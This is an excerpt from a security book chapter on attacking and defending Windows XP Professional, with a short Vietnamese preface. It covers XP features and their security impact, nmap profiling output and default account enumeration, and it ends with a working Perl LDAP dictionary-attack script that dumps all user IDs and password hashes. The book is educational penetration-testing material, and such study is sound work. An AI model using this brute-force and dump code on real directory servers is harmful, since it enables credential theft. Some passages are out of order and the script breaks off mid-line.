Đây là những bài viết khá hay , nếu bạn thích thì tự dịch và đọc .
Trích trong : Special Ops



Introduction
During his keynote speech at Comdex 2001, Larry Ellison, CEO of Oracle, made
the broad statement that his database technology, Oracle 9i, was “unbreakable.” Mr.
Ellison then went on to say that users could “keep their Microsoft Outlook and
we will make it unbreakable; and unbreakable means you can’t break it, and you
can’t break in.” Later on in his presentation, he went to talk about the significant
resources had been spent and focused on research and development and security
defenses within the database code itself in addition to its revamped clustering

Throughout this chapter, you will learn the differences of Windows XP and
Windows 2000 and the corresponding advantages and disadvantages. In addition,
you will be able to identify and profile a Windows XP Professional system and
craft specific attacks to exploit the identified weaknesses.The later part of the
chapter deals with locking down or securing Windows XP and the methods that
should be taken to ensure unsolicited attacks are not successful on your system.
The end of the chapter briefly touches upon system and security maintenance
specifically on the current version of Windows XP. As with other chapters in this
book, additional resources have been provided so that you can conduct further
research or stay abreast of advances in Windows XP technology.

Upgrading to XP Professional versus XP Home

www.syngress.com
Note that this chapter is written for Microsoft Windows XP Professional. A few
areas in the chapter reference both Windows XP Home and Windows XP
Professional by using the broad reference “Windows XP.” Aesthetically, there is no
difference between Windows XP Professional and Windows XP Home, but there
are a few technological feature differences between them.The most fundamental
difference between the two is that only Windows XP Professional can be joined
to a domain.Windows XP Home and Windows XP Professional both are capable
of logging into or joining a workgroup, a technology that is geared towards small
business and home-based networks but not excluded from professional use.
Domain authentication, a strictly for-business technology, allows systems usage of
domain-provided resources such as printers, file servers, internal organization Web
sites, and so on.
In addition to not having domain authentication, XP Home users do not
have access to the XP Professional Remote Desktop feature.The Remote
Desktop Protocol (RDP) feature is similar to another popular feature,Terminal
Services.Terminal Services and Remote Desktop allow you to leave your computer
booted so that you can connect to it remotely via a Terminal Services
client or RDP just as if you were sitting at the console.
An excellent feature, similar to popular products like Symantec’s PCAnywhere,
it provides remote administration and usage capabilities with Microsoft standard
authentication and encryption. Another feature related to working remotely is the
Working with Offline Files option.This provides a user the ability to create mirrors
of networked folders, allowing such users the ability to update files while
offline.The key component of this feature is that it can automatically synchronize
the folder with the online folder when the connection is available.The synchronization
component is mutual—the client updates the server and vice versa.
On a performance note, XP Home does not support dual processor capabilities.
Hence, it would not be the ideal platform of choice for a high-end system
that would require processor-intense utilizations such as graphics systems, highlyutilized
streaming media servers, or even an enthusiast’s computer gaming station.
Lastly, XP Home does not come with the Encrypting File System (EFS),
potentially the most significant security-related feature. Microsoft really hit home
with this feature by making it extremely simple to use and allowing all of the
actual cryptography functions, encryption and decryption, to execute “behind the
scenes.” In XP Professional, all you have to do to utilize EFS to encrypt a file is
right-click the file and click Properties. Click on the General tab then click
Advanced. As shown in Figure 4.1, to encrypt the file you must just check the
Encrypt Contents to Secure Data option.There is no need for key management
or additional passphrases to remember. In most cases, the EFS feature alone
should be reason enough to upgrade to XP Professional rather than XP Home.
capability. Soon after, David Litchfield, a database security expert, announced that
he had found numerous bugs in Oracle thereby allowing him to add an administrative
account remotely in an unauthorized manner.What does this tell you?
Nothing is “unbreakable,” and don’t ever challenge the hacker community.

Another example of a gutsy initiative that had an opposite outcome was Bill
Gates’s XP statement. In cooperation with his marketing executives, Gates stated
that “Microsoft Windows XP is Microsoft’s most secure operating system, ever.”
Soon after the declaration, vulnerabilities in Windows XP were discovered.
According to statistics from the annual CSI/FBI Computer Crime Surveys, when
measured by frequency of vulnerabilities and release time, XP doesn’t even come
close to the few initial bugs released for Windows 3.1.The point: Bill Gates made
a bold statement; only if XP is configured properly does his statement stand true
that Microsoft Windows XP is the most secure Windows platform to date.
It is obvious that a great deal of research and architecture redesign thoughtcycles
went into the Microsoft Windows XP release. Besides the appealing physical
appearance and graphical interface, dramatic increases in speed, media enhancements,
user-friendly interface add-ons, and other efficiencies within the kernel,
Windows XP has incorporated several aspects of client-specific security features.
Windows XP, similar to Windows 2000 from a remote vulnerability assessment
point of view, is very different considering the built-in additional features when
conducting a local configuration review or local vulnerability assessment.

Windows XP Features

The Microsoft Windows XP platform provides key features and enhancements
over previous products, which is sure to make it the workstation OS of choice
going forward.You must realize that even though some of the features and
enhancements may not initially appear to be security-related, it is important to
know the OS differences especially if you have to do any type of local configuration
analysis or forensic discovery.Windows XP integrates the best of the best
when it comes to features from previous Windows-OS versions. It has implemented
almost all of the security features within Windows 2000, including the
rule-based and role-based security frameworks. In addition to security, it has also
implemented many of the user-friendly features from the Windows 95/98/ME
era, including the Plug and Play component (which I exploit later in the
chapter), quick time to boot, and easy user-based localized management.

The following sections detail most of the application and platform features
included within the default build of Windows XP Professional, both security and
bundled applications. Once you become familiar with the core-OS features, their
functionality, and the benefits of using them, you will have a complete understanding
of the platform and some necessary details for exploiting or defending
components and bundled applications.The bundled applications may not be
directly associated to the platform’s security posture, but they are required to
completely understand the significant platform modifications.

note : If you would like more general information on the platform or its components,
visit the Microsoft site at www.microsoft.com/windowsxp.

Bundled Applications

The following applications are bundled within Windows XP Professional by
default. Appropriate security-related knowledge and major enhancements or
changes to the applications have also been noted. An understanding of the role
and usage of these applications will prove valuable in later sections of the chapter
(even if some are not directly security-related, they may affect the overall usage/
execution of the OS, thereby allowing for certain DoS attacks to work or for
other vulnerabilities to be exploitable).

 Increased device driver support More device drivers for printers,
network cards, video cards, and so on are now built into the core operating
system.This allows an increased number of nonbundled applications
and hardware to be easily added without installing new device
drivers. Installing device drivers on Windows XP requires a specific kind
of privilege that most administrators do not want to provide to local
workstation users.The new additions are specific to XP but will in most
cases be incorporated into other future robust Microsoft platforms.
 Decreased system reboot time Windows XP has significantly modi-
fied the operating procedure in efforts to decrease system boot time and
restart time. In addition to optimization efforts, far fewer processes are
initially launched. Less user time is spent waiting on system booting and restarting.There is no security impact from this modification. It is XP-specific.

 Enhanced Windows installer The windows installer feature manages
driver and application installations, which provides a user with the ability
to undo, remove, upgrade, track or even configure such installed applications.
The installer provides users with the previously stated functionality,
which more or less decreases the likelihood that an error will occur after
software installations.There is no security impact from this modification.
It is not XP-specific.
 Intelligent user interface The Windows Explorer interface (not to be
confused with Internet Explorer) actively tracks highly used files, programs,
and links in order to make the most used objects the easiest to
access by presenting them first.There is no security impact from this
modification. It is not XP-specific.
 Web publishing Local Web pages, files, and folders can easily be published
to an online status via any system that uses the WebDAV protocol.
The local Web publishing is a simplified File Transfer Protocol (FTP)
process designed to minimize time and upload complexity for users. In
terms of security impact, the WebDAV protocol is Microsoft-specific
and provides only a minimal framework for authentication and layered
encryption. If the publishing feature is poorly configured on the serverside,
any user could use it to upload and overwrite current “productionstatus”
files. It is not XP-specific.
 Media enhancements You can now create CDs from Media Player,
view DVD movies because of the new built-in decoders and DVD software,
take part in video conferences, listen to Internet radio, and actively
set numerous types of files to be automatically executed.These enhancements
offer significantly better audio and video compatibility with
newly supported compression and encoding techniques. It saves users
time and effort of installing third-party software. Currently there is no
significant security risk with the media enhancements, but note that
Media player now executes far more files with uncommon extensions in
an attempt to automatically play.The danger exists because you must
trust the files you download and store locally.Media player and Windows
Explorer were modified to automatically execute some files just by
clicking once on the file or in some cases hovering over it.These enhancements
are XP-specific.
www.syngress.com
Attacking and Defending Windows XP Professional • Chapter 4 91
 Advanced Configuration and Power Interface (ACPI) A feature
geared towards the professionals who travel frequently,ACPI provides an
easy to use interface allowing the user full control over Plug and Play
compatibility, hot docking, and power management.The most useful feature
of ACPI is that it allows the user to configure the type of power
usage, thereby potentially increasing the time of system usage.There is
no security impact, but multiple vulnerabilities were identified in the
Windows Plug and Play feature).The enhanced application programming
interface (API) for ACPI is XP-specific.
 Wireless support Windows XP has bundled in device driver support
within the overall driver database, which allows for numerous commonly
used cards such as Linksys, SMC, and Cisco to be used via Plug and Play.
This support decreases user installation time by allowing multiple cards
to use some generic drivers that are preinstalled within Windows XP. In
terms of security impact, major computer vendors including Toshiba and
Dell are creating laptops with built-in 802.11 wireless cards that are
compatible with the drivers installed within Windows XP. Uneducated
wireless users are vulnerable targets to numerous types of protocol and
application-layer attacks.This enhancement is XP-specific (Windows XP
is the first Microsoft platform with built-in support).
 Network location identification The network location feature
allows the system to automatically identify whether the system has been
changed.The network card sends out a set of initiation broadcasts when
it notices that the cable has been disconnected and reconnected. It
allows the system to automatically configure the network card and use
network resources in an efficient manner. In terms of security impact,
the card initiation sequence is easily fingerprinted, thereby allowing an
attacker to identify a new system on the network by capturing the
broadcast messages and replies from the other network devices and systems.
This feature is XP-specific.
 Remote Assistance The Remote Assistance (RA) feature allows users
to share complete or partial access to their user environments.The feature
allows connected users the ability to see the screen, control the
pointer, and input keystrokes from their own local keyboards.This feature
was designed for IT administrators, network support, and distributed
peer working groups to minimize third-party administration utilities
and allow users to assist in problems remotely.To put it simply, it saves
www.syngress.com
92 Chapter 4 • Attacking and Defending Windows XP Professional
walking time. However, if improperly configured, RA could potentially
allow access to unauthorized users via an encrypted RDP 5.5 tunnel.
This feature is XP-specific (other facets of this existed previously, but
this version is significantly enhanced).
 System restore The Windows XP system restore function allows users
to restore a system to that of an earlier snapshot.These snapshots are created
automatically, thereby allowing the user to specify the desired state
to roll the system back to. It provides an additional layer of system
recovery that can be leveraged by users in the case that the system needs
to be restored. It also potentially saves time and data from what could
have been a potential loss.The security impact is that the system restore
feature stores the snapshot information into a specific file that can be
modified by an attacker.This function is not XP-specific.
 Device driver rollback The device driver rollback feature, similar
in design to the system restore feature, allows an administrator or user
to roll back to a previous version of driver in the case that it has
adversely affected the component, OS, or another application. It creates
a layer of protection for the user in the case that an older device driver
must be reinstalled.The security impact is that a malicious user with
Administrator-level access could damage rollback drivers.This function
is not XP-specific.
 Application compatibility This feature acts as a middleware application
geared towards fixing the numerous issues spawned from third-party
application errors. It provides fixes for these third-party applications even
before the vendor has created such fixes.The feature allows more thirdparty
software to run seamlessly with Windows XP.The security impact
is that a feature resides within this apparently wonderful feature that
allows a user to specify the environment in which the application should
execute (such as Windows NT or Windows 95/98/ME). Such a component
may allow for additional hybrids of previously published vulnerabilities
to be successful.This feature is XP-specific.
 User state migration software The feature simplifies data migration
from another Windows-based system to the newly installed Windows XP
system. It saves time and resources for data backup and transfer.There is
no security impact.This feature is XP-specific (the back-end processes
for the feature have been significantly changed over since versions).
www.syngress.com
Attacking and Defending Windows XP Professional • Chapter 4 93
 Automatic updates The automatic update feature allows users to
schedule and install relevant system and security updates through Webbased
connections to Microsoft. Forced automatic updates for your
system ensure that you have the latest versions of software and are kept
up-to-date with the security fixes and system patches.There is no security
impact (providing that you install the system patches and hotfixes).
This function is not XP-specific.
 Windows Update Catalog The Windows Update Catalog serves as a
guide for users to verify that their specific systems have the most up-todate
system fixes. It allows third parties and internal users to create applications
that can utilize the catalog to ensure that systems, organizations,
and network remain compliant.There is no security impact from this
function. It is not XP-specific.
 Internet Explorer 6 Administration Kit The Internet Explorer 6
(IE6) Administration Kit allows for an Administrator to configure media
settings, security policy settings, and personalized features and to download
rule sets.The feature allows network engineers and administrators
increased flexibility for the deployment of IE.There is no security
impact from this feature. It is not XP-specific.
 Remote OS installation The remote OS installation is not unique in
design, but it allows users to install Windows XP and other subsequent
operating systems over the network, provided that your network has
implemented an Active Directory (AD) infrastructure.The obvious benefit
is that it saves time for administrators and decreases install complications.
There is no security impact from this feature, as long as the “Install
Tunnel” is trusted. It is not XP-specific.
 Windows Management Instrumentation (WMI) The WMI is one
of the great features for third-party developers who desire their software
to interact with the Microsoft OS. It provides an adequate API for
accessing systems resources. It allows Administrators to manage system
resources using internally developed or third-party applications.An
excellent resource! There are numerous security concerns for this feature,
all which revolve around the concept of keeping this API secure
and allowing only Administrators to utilize it. It can control just about
all of the Microsoft Windows platform or at least anything important.
This feature is not XP-specific.
www.syngress.com
94 Chapter 4 • Attacking and Defending Windows XP Professional
 Network bridge The network bridge feature allows a system to faultlessly
transfer or extend communication between different types of networks.
It potentially allows one system to communicate via multiple
medias simultaneously.There is no security impact from this feature. It is
not XP-specific (versions of this have existed in the past, yet wireless
media is now incorporated).
 Internet Connection Sharing (ICS) The ICS feature is geared
towards home networks and small businesses that require Internet connection
services for a small amount of systems. It allows one system to
act as the network relay to the Internet, thereby sharing bandwidth. ICS
has built-in functions to include network address translation (NAT),
system addressing, and domain name resolution services (DNS). It saves
money and network device resources allowing others to simply connect
via the specified system. In terms of security impact, if the ICS server
were compromised all data going to and from the systems on the local
network to the Internet would be compromised since it is routed
through the ICS server. Sessions could be hijacked and or redirected,
DNS could be corrupted, and the network connection could be killed,
to mention a few. Remember, the system is the center for communication
and is trusted by the clients.This feature is not XP-specific.
 Dual processor and memory support Windows XP Professional
includes the capability to support dual processors and up to 4GB of
memory.This kind of functionality was designed for computer game
advocates, graphic designers, engineers, software developers, and others
that require powerful processing systems.The feature allows XP
Professional to be used in a more CPU/hardware-intense environment.
There is no security impact from this feature. It is XP-specific (XP
Home does not have this; however, other Microsoft server platforms
such as NT and 2000 do have this capability).
 Decreased system reboot frequency Due to the nature of the modularized
environment,Windows XP decreased the number of instances
that require system reboots by modifying the system in real-time.The
motion is similar to that of a Unix environment. It saves user time and
allows for the system to stay in production mode.There is no security
impact from this feature. It is XP-specific.
www.syngress.com
Attacking and Defending Windows XP Professional • Chapter 4 95
 Dual DLL support The dual dynamical link library (DLL) support
allows users to simultaneously run multiple versions of the same product
on the same system. It allows multiple versions of the same product to
reside on the system, which is an excellent feature for developers or
product support professionals.There is no security impact from this feature
(the DLLs do not execute in the same memory space). It is XP-specific.
 Offline files and directories The feature permits a user to specify
network-based files and folders, in which they have proper access, to
store, modify, and then resynchronize with the online versions. It allows
users to modify network-based resources while offline. In terms of security
impact, if proper access is not controlled at the network-layer, malicious
files could be synchronized upward. For instance, a macro-virus
could be saved to an online Word document. It is XP-specific (similar,
weaker versions of this existed in previous Windows 2000 releases).
 Offline Web page viewing Offline Web page viewing stores information
locally for Web sites that you choose, thereby allowing you to view
the pages at a later time. It minimizes time that a user must be connected
to the network allowing pages or articles to be viewed at a later
period of time.The security impact is that if malicious script code or
objects were included in the saved Web page then the storing and
reloading of the Web page could adversely affect the system just as if it
were online.This feature is XP-specific.
 Microsoft Management Console (MMC) The MMC is an excellent
tool that allows a user to manage system settings including users,
groups, security policy settings, auditing configurations, hardware,
event/system/security logs, applications, and others. It is a great feature
that allows administrators to manage all system settings from within a
single user interface.There is no security impact (just understand that
this is a powerful tool).The tool is not XP-specific.
Security Focused Features
Microsoft invested a significant amount of resources in the design and implementation
of the security model for the Windows XP Professional platform. Multiple
key tools and features have been added that automatically harden the system
or allow the user to further secure XP Professional with a minimal amount of
effort. Features range from kernel modifications to encryption tools to softwarewww.
syngress.com
96 Chapter 4 • Attacking and Defending Windows XP Professional
restriction-based access control lists.The key additions are further detailed
throughout this section.
 Kernel data structures Microsoft has altered the protection schema for
kernel data structures to the extent that all of them are read-only. Since
the kernel data structures are read-only, there is minimal chance for applications
and device drivers to distort them.There is no security impact,
unless you have significant experience in reverse engineering assembly
code used to create the queued spinlocks.This feature is XP-specific.
 Increased file protection Windows XP increased the protection for
core OS files from being manipulated, overwritten, or deleted during
application installations.The protections that were put in place monitor
the system calls for file removal, and if an error occurs, the system restore
function will allow you to remove the installation. It benefits the user by
adding protection to files for post-installation errors.There is no security
impact from this feature. It is XP-specific.
 Software Restriction Policies The additional Software Restriction
Policies allow for a policy-driven mechanism to identify software that
runs on the local environment.The focus behind the feature is to eliminate
numerous virus and Trojan-based threats. It allows for added local
protection against malicious application-layer attacks through an enterprise-
level mechanism. In terms of security impact, Software Restriction
Policies allow administrators to configure policies to disallow the execution
of certain types of files.This feature is XP-specific.
 Encrypting File System (EFS) EFS secures system files and folders
with an internal secret key derived from user authentication credentials.
It is very simple to use, to the extent that you need to just right-click on
the file and then select Encrypt. It is an easy method for securing critical
files with standard cryptography algorithms. In terms of security
impact, in numerous cases EFS is mistaken for a highly secured cryptography
algorithm in which the user gets to configure the encryption settings.
EFS does not hide files nor does it secure files in any means
besides local encryption. A user would be able to brute-force the file
payload if it were to be intercepted or retrieved from the local system. In
addition, it may difficult to recover EFS-encrypted files that have been
moved to other systems with different users.This feature is not necessarily
XP-specific.
www.syngress.com
Attacking and Defending Windows XP Professional • Chapter 4 97
 IP Security (IPSec) IPSec is an Internet Protocol (IP)–layer encryption
schema to encrypt data between systems. IPSec is an industry standard
in tunnel encryption for internal and external network
connections. In terms of security impact, IPSec should be utilized for
consistent system-to-system traffic, even in the case of local network virtual
private networks (VPNs).This feature is not XP-specific.
 Kerberos Windows XP is bundled with the Kerberos authentication
protocol as a standard for authenticating across numerous types of platforms
and devices throughout the network.The standard encrypts all payload
data during the authentication process. Kerberos can be utilized for
multiple platforms and can be utilized for a single sign-on for Windows
2000 and .NET Server resources. In terms of security impact, all systems
should utilize the latest version of Kerberos and an inherent trust between
the Kerberos clients and servers.This feature is not XP-specific.
 Smart cards Imbedded smart-card functionality is included by default
within Windows XP. It allows you to use a terminal services client to log
into smart-card servers or terminal servers with additional third-party
smart-card applications. Implementing a smart-card infrastructure provides
an excellent method for ensuring that password and authentication
schemas are secured. In terms of security impact, smart-card servers
should be secured from a local, network, and physical perspective since it
is a highly trusted system.This feature is not XP-specific.
 Remote Desktop The Remote Desktop application allows users to
access their machines remotely. It is similar to other remote administration
products in that only one session can be executing at a time; hence
you cannot be logged on and working locally while another individual is
working on a remote session. Remote Desktop currently utilizes
Microsoft’s RDP 5.5 communication protocol. It allows users to work
on their systems remotely and is excellent for developers who want to
connect via a less-powerful laptop and run enterprise-level applications.
It is possible for a malicious user to connect to your computer and take
control of it via successful authentication credentials. If this were to
happen, the malicious user would have the access of the authentication
credentials provided.This feature is not XP-specific.
 Credential Manager Credential Manager serves as a secured location
for authentication credentials, usernames, and passwords, so that they
www.syngress.com
98 Chapter 4 • Attacking and Defending Windows XP Professional
may be automatically reused in the future for repeatable logons or access
to secured network-based resources. It saves time and repetitive energy
from end users that must consistently re-enter usernames and passwords
for resource access. Currently, there are no published vulnerabilities that
exploit the credential manager allowing malicious users or processes the
ability to retrieve credentials.This feature is XP-specific.

Attacking XP Professional

Attacking Windows XP Professional is similar to attacking other Microsoft operating
systems—and yes, some of the same attacks work. However, a few differences
arise when you are attacking a system that has implemented some of the
key security features within the XP Professional environment. In the following
section, you will learn to profile and identify the OS in an organizational environment
in addition to learning to identify a system with the XP Internet
Connection Firewall implemented.You will also learn the details for the most
critical attacks that currently exist specifically for the XP Professional platform.Of course, numerous tools and techniques are available to profile and exploit
Windows-based operating systems and applications.Throughout this portion of
the chapter I have therefore utilized a subset of these many security tools in combination
with public and author-developed exploits.The tools and techniques
we’ve chosen to present represent a good method for testing and exploiting the
given targets.

Profiling Windows XP Professional

The attacker modus operandi differs from person to person; however, most attackers
will agree that they need to gain a substantial amount of information about a
target before attempting any attacks. In the initial chapters of the book, you
learned a good methodology for profiling or footprinting a target system. It is
not uncommon for attackers to profile a target system and its applications for a
significant amount of time (this could be about 80–90 percent of the overall
assessment time). Our profile of Windows XP will encompass all of the techniques
and tactics utilized during an above-average vulnerability assessment. It
will not encompass utilizing packet replay attacks or additional machines for
packet capturing or man-in-the-middle attacks. It is important to note that the
profile was created and the tools were executed in a non-evasive manner. Some
of the results may be different if you want to bypass intrusion detection systems
or filtering systems.

The Windows XP Professional Target

The XP Professional profile that we’ll develop in this chapter is meant to accurately
detail what services, protocols, and responses can be ascertained from footprinting
a default installation of XP Professional without any installed patches or
hotfixes.We’ll use the profile later as an identifier for potential target injection
points and methods for determining which attacks and nudge strings will return
what types of information without actually executing the attacks.
Profiling the XP Professional target in this case will consist of determining
what ports are open on the system and corresponding services, identifying system
users and shares, gathering implemented protocols, and analyzing protocol
responses. Analysis of this information will enable you to potentially glean
exploitable holes and security injection points within XP Professional.

Port Scanning

An excellent method in determining active services and open ports on a system
is to run a complete port scan of the target system.When conducting a profile of
a system when you are not concerned with evading intrusion detection systems,
whether it is local or remote systems, it is always recommended to go with a full
TCP Connect scan.The following scan output displays what NMAP 3.0 would
show if you ran it to test for a full port scan via SYN or TCP Connect methods:
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
(The 65535 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
Remote operating system guess: Windows Millennium Edition (Me),
Win 2000, or WinXP
Nmap run completed -- 1 IP address (1 host up) scanned in 37 seconds
The following is a full-blown UDP scan of the XP Professional target system:
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on 10.0.100.100:
(The 65523 ports scanned but not shown below are in state: closed)
Port State Service
123/udp open ntp
135/udp open epmap
137/udp open netbios-ns
138/udp open netbios-dgm
445/udp open microsoft-ds
500/udp open isakmp
1026/udp open unknown
1029/udp open unknown
1033/udp open unknown
1900/udp open unknown
8195/udp open unknown
42811/udp open unknown
Nmap run completed -- 1 IP address (1 host up) scanned in 47 seconds
As you can see, the system has some open TCP and User Datagram Protocol
(UDP) ports. Now, the differences that you may not initially notice are what ports
differ from previous platforms to include Windows 2000 and NT. Port 445, commonly
utilized in XP for authentication purposes, is a Windows 2000– and XPspecific
port and stands for Microsoft Direct Host. Numerous other tools exist
that run port scans; similarly you can probably find a port scanner written in just
about every network-based programming language—plus, this functionality is
built into just about every commercial and public vulnerability scanner.

ICMP Discovery and Fingerprinting

The Internet Control Message Protocol (ICMP) is one of the most useful protocols
when you are attempting to profile a remote system. Identifiable anomalies
in the protocol allow you to make an educated guess about the alleged operating
system of the target host.The obvious benefit of knowing the target operating
system is pinpointing the classification of attacks for that particular OS. In addition
to ICMP, other means of analysis (such as banners, services, and protocols)
make for other excellent additions to any OS fingerprinting methodology. Almost
all vulnerability scanning products implement some form of OS identification,
but the standout industry standard is NMAP’s OS Fingerprinting library. As such,
numerous scanners simply implement the NMAP capability. In addition to
NMAP, other proprietary OS detection tools within products include FoundScan
and ISS.You can find additional vendor product-specific implementation details
at their respective Web sites.

 Retina www.eeye.com
 NMAP www.insecure.org/nmap
 Foundscan www.foundstone.com
 ISS www.iss.net
Another excellent source for information is www.sys-security.com/html/
projects/icmp.html. Ofir Arkin, founder of the Sys Security Group, has done
extensive research into ICMP and published a wide range of papers, tools, and
intrusion detection signatures that may prove educationally beneficial.
The following NMAP output shows that the NMAP OS detection function
limited the OS down to one of three potential operating system matches. (If you
look ahead in the chapter to Figure 4.2, eEye’s Retina only narrowed the potential
OSs down to four.)
Starting nmap V. 3.00 ( www.insecure.org/nmap )
Interesting ports on (10.0.100.100):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millennium Edition (Me), Win 2000,
or WinXP
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
To utilize the NMAP OS detection function, you must scan and receive a
response for a minimum of one open port. A good port to search for on
Microsoft-based operating systems is 139, the common NetBIOS port, when utilizing
NMAP to determine OS type.

Gathering Pertinent System Informatio

 MAC address The Media Access Control (MAC) address is utilized as
an addressable reference below the Network and Application layers for
direct system-to-system communication. In most cases, a user can determine
what type of network card is being utilized by determining the
MAC address on that card. In addition to gathering target information,
the MAC address can be utilized to spoof a target address and in-session
hijacking attacks.
 Hostname A system’s hostname is another way for addressing or referencing
a specific computer system and can be leveraged in a number of
man-in-the-middle and direct attacks. In most cases, a type-full system
hostname will also include network- and domain-specific information.
 Route to host The route to the host is an identifiable route or map to
the target system. In most cases, you can learn the IP addresses of each
system that your packet transfers through on the way to the target
system. Discovering the relevant host route is pertinent because it allows a user the ability to potentially compromise or target nearby systems in
hopes that it may provide advantages in compromising the initial target
system. In addition, a multiple route potentially can be analyzed to create
a network map of the target system’s environment.

 Authentication server Authentication servers take numerous forms,
and in this case, systems such as the domain controllers, Kerberos servers,
or Public Key Infrastructure (PKI) servers are popular targets because
they store system authentication credentials.
 DHCP server The Dynamic Host Configuration Protocol (DHCP)
server provides IP address information to systems joining a network.
Information pertaining to the leasing address space, other networked systems,
and the network in general can be ascertained from a DHCP
system compromise.
 DNS server The server that provides domain name information to the
target system is a key piece of information and can be leveraged in multiple
Address Resolution Protocol (ARP) cache attacks, such as the popular
ARP cache poisoning attack.
 Default router or gateway The default router or gateway is the
system that receives all of the communication between that system and
the outside world. If the target system is communicating with another
system outside of the local network, the default gateway will transmit
packets to the appropriate gateway in its local table of gateways. Note
that the default gateway is one of the most popular targets when
attempting to compromise a system.
Most of these can be determined without authentication if you have the
ability to capture packets off the network segment on which the target system
resides. If you do not have local access, you may have a difficult time getting the
MAC address and corresponding servers.Vulnerability scanners such as Retina
and FoundScan retrieve just about all of this information if available. Other
tools you may want to use are GetMAC and CTIS (you can find both at
www.packetstormsecurity.org), nslookup, tracert, and Ethereal. Nslookup and tracert
(the Unix version is Traceroute) are bundled with almost all Windows and Unixbased
operating systems. Ethereal’s site is www.ethereal.org.

Enumerating Users, Groups, and Shares

Just as with any operating system,Windows XP Professional has built-in users and
groups.These users can be enumerated in addition to user groups and shares.The
system shares configured by default that are remotely accessible are tied into specific
system directories. For instance, the C$ share maps back to C:\ and the
Admin$ share maps back to C:\Winnt\.The IPC$ share is remotely available for
anonymous users to use null session connections.
Groups configured on XP Professional by default include the following:

 Administrators
 Power Users
 Guests
 Backup Operators
 Remote Desktop Users
 Users
 Replicator
 Debug Users
 HelpServicesGroup
 Network Configuration Operators
Users configured on XP Professional by default include the following:
 Administrator
 Guest (disabled)
Shares configured on XP Professional by default include the following:
 C$
 Admin$
 IPC$

The eEye Retina vulnerability scanner, pictured in Figure 4.2, is a relatively
good tool that can be quickly used to profile a target system.Trial versions can
be downloaded and used for 15 days without any end user cost. Figure 4.2
shows a full Retina vulnerability and port scan executed against our target XP
Professional system. As you can see, Retina identified the open shares,TCP ports,hypothesized OS,MAC, and a route-to-host, which was omitted. In addition to
these, it identified multiple other services and protocols implemented on the box.
Tools such as Retina simplify the profiling process and can quickly execute
numerous attacks.

Exploiting Windows XP Professional

Windows XP Professional has numerous vulnerability injection points that can be
exploited to provide a malicious user with privileged access or deny service to a
user or all users attempting to utilize the target system.The injection point types
can be categorized in three manners:
 Remote exploits
 Local exploits
 Miscellaneous exploits and vulnerabilities.

Remote and local exploits are simply the method in which the vulnerabilities
are exploited. For example, the remote exploits are network-based and in most
cases are spawned from a system different than the target system.The local
exploits are either local vulnerabilities, such as privilege escalation or race conditions,
or client-side bugs that initiate from the target system. Internet Explorer
vulnerabilities are a perfect example of local exploits because you place a reasonable
amount of trust in a Web server’s data that you are connecting to and
because you initiated the connection.

Remote Exploits

The following exploit examples (LDAP attacks, the Plug and Play Denial of
Service attack, and XP access point information disclosure) are remotely
exploitable on the XP Professional operating system. All of these have been conducted
and carried out on the same system that was used to conduct the system
profile shown previously. Especially for the remote system exploits, some of these
vulnerabilities have the potential to inflict damages on the local system of the
malicious user.

LDAP Attacks

The Lightweight Directory Access Protocol (LDAP) is a specialized database
technology based upon the X.500 standard that allows a user or system to categorize
entries in a hierarchical structure. One of the big advantages and selling
points for LDAP is that it is cross-platform and standards-based, which easily
allows for developers to create client and server software to speak the LDAP language.
The following code is written in Perl and effectively targets LDAP servers
and attempts to brute force manager accounts housed within an LDAP database.
All of the error checking and input validation was removed in addition to the
efforts made to streamline some of the code. It will execute a dictionary style
attack on an account, thus attempting to exploit a weak user password.

#! /usr/bin/perl
# ldap.pl
# Created By: Victim1
# Modified By: James C. Foster
# Don't mess up, there is no error checking or input validation
use Getopt::Std;
# Getting Attack Options
getopts("t:d:b:u:l:?", \%args);
if($args{t}) { $target = $args{t}; }
if($args{d}) { $dn = $args{d}; }
if($args{b}) { $base = $args{b}; }
if($args{u}) { $user = $args{u}; }
if($args{l}) { $dictionary = $args{l}; }
if($args{h}) { usage(); }
brute();
ldap_connect(@passwords);
# Connect to the system and try binding to the LDAP server with the
# password array supplied by the brute() function, calls the get_accounts
# function to actually make the connection
sub ldap_connect {
foreach $password (@passwords) {
use Net::LDAP;
$ldap = Net::LDAP->new($target);
$ldap->bind ($dn, password => $password );
$ldap->unbind;
get_accounts($target, $password);
}
}
# Opens the dictionary file and processes each of the passwords into a
# password array to be used during the brute force attack
sub brute {
open(DICT, "<$args{l}") or die "Cannot open: $args{l} $@\n";
@passwords = <DICT>;
close(DICT);
chomp @passwords;
} # Uses an account out of the password dictionary to try and leverage
# access to the LDAP database sub get_accounts {
use Net::LDAP;
$ldapc = Net::LDAP->new($target) or die "$@";
$ldapc->bind($dn, password => $password) || die "$@";
$mesg = $ldapc->search (
base => $base,
scope => "subtree",
filter => "(uid=$user)"
);
$mesg->code && die $mesg->error;
$i=0;
foreach $entry ($mesg->all_entries) {
@uid=$entry->get_value('uid');
@pass=$entry->get_value('userpassword');
$test =
($uid[0].":".$pass[0].":".$i.":".$i.":/".$uid[0].":");
if ($test =~ /$uid[0]:{SHA}/) {
print "Password Retrieved is -> $password\n";
sleep 2;
dump_database();
exit;
} else {
$ldapc->unbind;
return 0;
}
}
}
# Dumps the LDAP Database using a password supplied from the brute force
# attack and the corresponding user id (UID)
sub dump_database {
$ldap = Net::LDAP->new($target) or die "$@";
$ldap->bind($dn, password => $password) || die "$@";
$mesg = $ldap->search (
base => $base,
scope => "subtree",
filter => "(uid=*)"
);
$mesg->code && die $mesg->error;
$i=0;
foreach $entry ($mesg->all_entries) {
@uid=$entry->get_value('uid');
@pass=$entry->get_value('userpassword');
print $uid[0].":".$pass[0].":".
$i.":".$i.":/".$uid[0].":\n";
}
$ldap->unbind;
}
# Simply Usage Subfunction that provides the user with some guidance
sub usage {
print <<USAGE;
Usage: perl LDAP_Brute.pl [-?] -tdbul
-t Target IP Address
-d dn -> cn=Manager,o=organization,c=country ( US )
-b base dn (o=Microsoft,c=US)
-u User
-l Password Text File
-h Usage
Sample: perl LDAP_Brute.pl -t 192.168.20.10 -d
